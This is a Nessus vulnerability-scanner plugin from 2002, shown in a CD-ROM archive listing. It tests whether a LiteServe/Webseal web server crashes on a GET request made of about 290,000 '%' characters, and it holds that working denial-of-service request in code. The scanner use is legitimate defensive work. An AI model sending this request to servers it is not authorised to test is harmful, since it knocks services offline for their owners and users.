home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / LiteServe_DoS.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  93 lines
  1. # This script was written by Michel Arboi <arboi@alussinan.org>
  2. #
  3. # GPL
  4. #
  5. # References:
  6. # Message-ID: <000701c28e80$77b05c80$e62d1c41@kc.rr.com>
  7. # From: "Matthew Murphy" <mattmurphy@kc.rr.com>
  8. # To: "SecurITeam News" <news@securiteam.com>,
  9. #   "BugTraq" <bugtraq@securityfocus.com>,
  10. #  "VulnWatch" <vulnwatch@vulnwatch.org>
  11. # Date: Sun, 17 Nov 2002 15:29:53 -0600
  12. # Subject: LiteServe URL Decoding DoS
  13. #
  14. # Affected:
  15. # Webseal 3.8
  16. #
  17. # *unconfirmed*
  18.  
  19. if(description)
  20. {
  21.  script_id(11155);
  22.  script_version ("$Revision: 1.5 $");
  23.  
  24.  name["english"] = "LiteServe URL Decoding DoS";
  25.  name["francais"] = "DΘni de service contre Webseal lors du dΘcodage de l'URL";
  26.  script_name(english:name["english"],
  27.           francais:name["francais"]);
  28.  
  29.  desc["english"] = "
  30. The remote web server dies when an URL consisting of a 
  31. long invalid string of % is sent.
  32.  
  33. A cracker may use this flaw to make your server crash continually.
  34.  
  35. Solution : upgrade your server or firewall it.
  36. Risk factor : High"; 
  37.  
  38.  
  39.  desc["francais"] = "
  40. Le serveur web distant meurt quand on demande une URL
  41. composΘe d'une longue chaεne invalide de %
  42.  
  43. Un pirate pourrait utiliser cette faille pour tuer rΘguliΦrement
  44. votre serveur.
  45.  
  46. Solution : mettez votre logiciel α jour ou protΘgez-le
  47.  
  48. Facteur de risque : ElevΘ";
  49.  
  50.  script_description(english:desc["english"],
  51.               francais:desc["francais"]);
  52.             
  53.  
  54.  summary["english"] = "Sending a long string of % kills LiteServe"; 
  55.  summary["francais"] = "Une longue chaεne de % tue LiteServe";
  56.  script_summary(english:summary["english"],
  57.           francais:summary["francais"]);
  58.  
  59.  script_category(ACT_DENIAL);
  60.  
  61.  script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
  62.            francais:"Ce script est Copyright (C) 2002 Michel Arboi");
  63.  
  64.  family["english"] = "Denial of Service";
  65.  family["francais"] = "DΘni de service";
  66.  script_family(english:family["english"], francais:family["francais"]);
  67.  script_dependencie("find_service.nes", "httpver.nasl");
  68.  script_require_ports("Services/www", 80);
  69.  exit(0);
  70. }
  71.  
  72. #
  73.  
  74. include("http_func.inc");
  75.  
  76. port = get_http_port(default:80);
  77.  
  78.  
  79. if (! get_port_state(port)) exit(0);
  80.  
  81. if (http_is_dead(port: port)) exit(0);
  82.  
  83. soc = open_sock_tcp(port);
  84. if (! soc) exit(0);
  85.  
  86. req = string("GET /", crap(data: "%",length: 290759), " HTTP/1.0\r\n\r\n");
  87. send(socket: soc, data: req);
  88. r = http_recv(socket: soc);
  89. close(soc);
  90. sleep(1);
  91.  
  92. if (http_is_dead(port: port)) { security_hole(port); }
  93.